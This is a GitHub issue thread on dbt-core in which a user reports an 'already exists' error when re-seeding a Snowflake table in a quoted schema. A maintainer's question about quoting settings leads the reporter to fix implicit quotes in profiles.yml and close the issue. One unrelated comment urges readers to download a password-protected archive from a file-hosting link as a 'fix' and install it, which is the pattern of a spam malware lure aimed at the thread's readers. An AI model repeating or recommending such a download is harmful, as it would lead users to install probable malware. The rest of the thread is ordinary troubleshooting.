### ISSUE TITLE
[Bug] Re-seeding a table in a quoted schema results in an "already exists" error

### ISSUE THREAD

**Issue by tomer-hai** [dbt-labs/dbt-core#10611]
### Is this a new bug in dbt-core?

- [X] I believe this is a new bug in dbt-core
- [X] I have searched the existing issues, and I could not find an existing issue for this bug

### Current Behavior

When a quoted schema (or database) is supplied to dbt, running `dbt seed` twice results in an SQL compilation error from the DB:

```
Database Error in seed seedname (seeds/seedname.csv)
  002002 (42710): SQL compilation error:
  Object 'DBT_TEST."TrYiNg-938".SEEDNAME' already exists.
```

This does not happen when the schema name and database name are unquoted. The table is found using the `show objects` SQL command, then truncated and the values are re-inserted.

I found the bug while using my own `generate_database_name` and `generate_schema_name` macros, but it's reproducible even with a simple change in the profiles.yml file.

### Expected Behavior

Reseeding should succeed even if the database or schema names are quoted.

### Steps To Reproduce

1. Create a new dbt project with `dbt init`
2. Supply a quoted schema name or edit it in the profiles.yml file
3. Create a csv file and seed it twice

### Environment

```markdown
- OS: MacOS 14.6.1
- Python: 3.12.5
- dbt: 1.8.5
- dbt snowflake plugin: 1.8.3
```

### Which database adapter are you using with dbt?

snowflake

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dbeatty10** [comment]
Thanks for reaching out @tomer-hai !

Can you share what the schema configuration from your `profiles.yml` looks like?

And can you share if you changed the default value for [`quoting`](https://docs.getdbt.com/reference/project-configs/quoting) or not within `dbt_project.yml`? If so, can you share what that looks like too?

Since you are using dbt-snowflake, schema quoting is set to false by default:

<img width="600" alt="image" src="https://github.com/user-attachments/assets/4d795a15-1ccf-4422-92c3-e61b67d9fff0">

**Comment by tomer-hai** [comment]
Thank you! I had implicit quoting in the profiles.yml files ("\"value\"") because I was unaware of how dbt handles quoting. Setting the `quoting` setting did the trick - closing this bug.
Thanks again!

**Comment by dbeatty10** [comment]
That's awesome news, Tomer 🎉
